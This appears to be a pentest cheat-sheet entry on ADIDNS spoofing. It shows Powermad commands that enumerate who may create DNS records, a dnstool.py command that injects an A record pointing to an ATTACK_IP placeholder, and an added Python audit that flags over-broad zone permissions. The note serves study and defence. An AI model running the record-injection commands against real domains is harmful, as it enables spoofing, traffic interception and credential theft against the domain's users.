ADIDNS Spoofing
Powermad.ps1: CreateChild permission
PS > $User = 'domain.local\user';$Pass = ConvertTo-SecureString 'password' -AsPlainText -Force;$Cred = New-Object System.Management.Automation.PSCredential($User, $Pass)
PS > Get-ADIDNSPermission -Credential $Cred -Verbose | ? {$_.Principal -eq 'NT AUTHORITY\Authenticated Users'}
Principal : NT AUTHORITY\Authenticated Users
IdentityReference : S-1-5-11
ActiveDirectoryRights : CreateChild
InheritanceType : None
ObjectType : 00000000-0000-0000-0000-000000000000
InheritedObjectType : 00000000-0000-0000-0000-000000000000
ObjectFlags : None
AccessControlType : Allow
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
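Added example (not from the original page or from Powermad): a small Python audit that parses Get-ADIDNSPermission list output like the above and flags Allow ACEs that give a broad principal the right to create child objects in the zone. The first sample ACE repeats the one shown above; the other two, including the DnsAdmins SID, are constructed for illustration.

```python
# Added example: audit Get-ADIDNSPermission list output for broad create rights.
# Well-known SIDs: Everyone, Authenticated Users, BUILTIN\Users.
BROAD_SIDS = {"S-1-1-0", "S-1-5-11", "S-1-5-32-545"}
RISKY_RIGHTS = {"CreateChild", "GenericAll"}  # GenericAll includes CreateChild

# Constructed sample: ACE 1 matches the page, ACEs 2 and 3 are made up.
SAMPLE = r"""
Principal : NT AUTHORITY\Authenticated Users
IdentityReference : S-1-5-11
ActiveDirectoryRights : CreateChild
AccessControlType : Allow

Principal : DOMAIN\DnsAdmins
IdentityReference : S-1-5-21-1111111111-2222222222-3333333333-1101
ActiveDirectoryRights : GenericAll
AccessControlType : Allow

Principal : Everyone
IdentityReference : S-1-1-0
ActiveDirectoryRights : GenericRead
AccessControlType : Allow
"""

def parse_aces(text):
    """Split 'Key : Value' list output into one dict per ACE."""
    aces, cur = [], {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if not sep or not key or (key == "Principal" and cur):
            if cur:                      # blank line or next ACE: close the record
                aces.append(cur)
                cur = {}
            if not sep or not key:
                continue
        cur[key] = value
    if cur:
        aces.append(cur)
    return aces

def is_broad(sid):
    # RID 513 under a domain SID is Domain Users.
    return sid in BROAD_SIDS or (sid.startswith("S-1-5-21-") and sid.endswith("-513"))

def risky_aces(aces):
    """Allow ACEs where a broad principal can create child objects in the zone."""
    return [a for a in aces
            if a.get("AccessControlType") == "Allow"
            and is_broad(a.get("IdentityReference", ""))
            and {r.strip() for r in a.get("ActiveDirectoryRights", "").split(",")} & RISKY_RIGHTS]

if __name__ == "__main__":
    for ace in risky_aces(parse_aces(SAMPLE)):
        print("REVIEW:", ace["Principal"], ace["ActiveDirectoryRights"])
```

An ACE flagged here means any account in that group can add new records to the zone, so it is the entry to review when restricting record creation.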
dnstool.py
$ python3 dnstool.py -u domain.local\\username -p password --action add --record recordname --data ATTACK_IP --type A domain.local
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully